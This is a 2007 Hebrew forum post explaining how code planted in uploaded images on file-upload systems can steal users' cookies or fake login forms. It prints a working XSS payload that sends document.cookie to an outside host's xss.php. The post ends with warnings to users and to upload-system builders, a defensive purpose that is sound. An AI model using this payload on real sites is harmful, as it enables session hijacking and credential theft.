לוגו אתר Fresh          
 
 
  אפשרות תפריט  ראשי     אפשרות תפריט  צ'אט     אפשרות תפריט  מבזקים     אפשרות תפריט  צור קשר     חץ שמאלה ‎print ‎"Hello World!"; if‎ ‎not rules.‎know ‎then rules.‎read(); חץ ימינה  

לך אחורה   לובי הפורומים > מחשבים > תכנות ובניית אתרים
שמור לעצמך קישור לדף זה באתרי שמירת קישורים חברתיים
תגובה
 
כלי אשכול חפש באשכול זה



  #1  
ישן 24-11-2007, 11:27
צלמית המשתמש של netaneldj
  netaneldj netaneldj אינו מחובר  
 
חבר מתאריך: 01.05.06
הודעות: 7,861
Facebook profile
למבוגרים בלבד פירצת אבטחה במערכות העלאת קבצים.

מדריך זה אינו מעודד פריצות, או כל שימוש שעשוי להיות לרעה.

האחריות היא עליכם.

מצרכים:
  • מערכת העלאת קבצים
  • עוגיות שמורות עם אותו ניתוב
פרצת האבטחה החמורה הזאת התגלתה בשרתי הדוא"ל של נענע, וואלה, הוטמייל ועוד רבים (אך טופלה לא מזמן) כך שעדיין יש המון אתרים שלא חסמו את זה.

הרעיון הוא להשתיל קוד דרך תמונה פשוטה שעשויה להיראות תמימה, אך היא יכולה לגרום למשתמש שלכם להיפרץ, או אפילו גרוע יותר.

הנה דוגמא קטנה:

https://2007-uploaded.fresh.co.il/2...24/55431145.gif

לאלה שיודעים טיפה JS והסתכלו במקור התמונה כבר כל העניין עשוי להתברר, אבל למען אלה שעדיין לא הבינו אמשיך לקונספט עצמו.

העוגיות נשמרות תחת ניתוב מסויים, שהוא מבדיל אותן בין אם הן עוגיות של פורום פרש, או כל פורום/מערכת אחרת תחת דומיין אחר.

לכן ברגע שהפעלתם קובץ מושתל שלכם בשרת מרוחק, הגישה לעוגיות מתאפשרת.

הנה דוגמא להצגה של העוגיה שלכם מפורום פרש:
https://2007-uploaded.fresh.co.il/2...24/76529332.gif

במקרה זה הקוד רק מציג את העוגיות שלכם בפרש, אבל מה אם הן היו נשלחות להאקר כלשהו?

למשל דבר כזה עשוי "לגנוב" את העוגיות שלכם ולשלוח לאדם לא רצוי:





קוד:
<script>window.location.href="http://www.domain.co.il/xss.php?s="+document.cookie</script>


עוד דרך לגנוב שם משתמש וסיסמא היא לבנות תמונה שמכילה קוד של התחברות מקורית, כך שתכולת התמונה תכיל היעתק מדוייק של ההתחברות.
אחרי שהמשתמש התמים יכניס את פרטיו הוא יבין שהוא נפל קורבן לידיו של האקר כלשהו.
אפשר אפילו להסוות התחברות כזאת להתחברות אמיתית, ככה שהקורבן אפילו לא יבחין בכך.

לכן אם אתם מקבלים לינק לתמונה כלשהי, שימו לב שאתם לא מתנתקים בפתאומיות מהמערכת, וכשאתם מתחברים אליה, תמיד הכנסו בעצמכם מחדש לאתר - והתחברו.

הנה דוגמא לזיוף התחברות:

https://2007-uploaded.fresh.co.il/2...24/22064108.gif

לכן גם אם אתם בעצמכם בונים מערכת העלאת קבצים, שימו לב לזה, אם אתם לא רוצים שמשתמשים יתחילו להיפרץ.

אז... היזהרו
תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
תגובה

כלי אשכול חפש באשכול זה
חפש באשכול זה:

חיפוש מתקדם
מצבי תצוגה דרג אשכול זה
דרג אשכול זה:

מזער את תיבת המידע אפשרויות משלוח הודעות
אתה לא יכול לפתוח אשכולות חדשים
אתה לא יכול להגיב לאשכולות
אתה לא יכול לצרף קבצים
אתה לא יכול לערוך את ההודעות שלך

קוד vB פעיל
קוד [IMG] פעיל
קוד HTML כבוי
מעבר לפורום



כל הזמנים המוצגים בדף זה הם לפי איזור זמן GMT +2. השעה כעת היא 12:22

הדף נוצר ב 0.06 שניות עם 10 שאילתות

הפורום מבוסס על vBulletin, גירסא 3.0.6
כל הזכויות לתוכנת הפורומים שמורות © 2024 - 2000 לחברת Jelsoft Enterprises.
כל הזכויות שמורות ל Fresh.co.il ©

צור קשר | תקנון האתר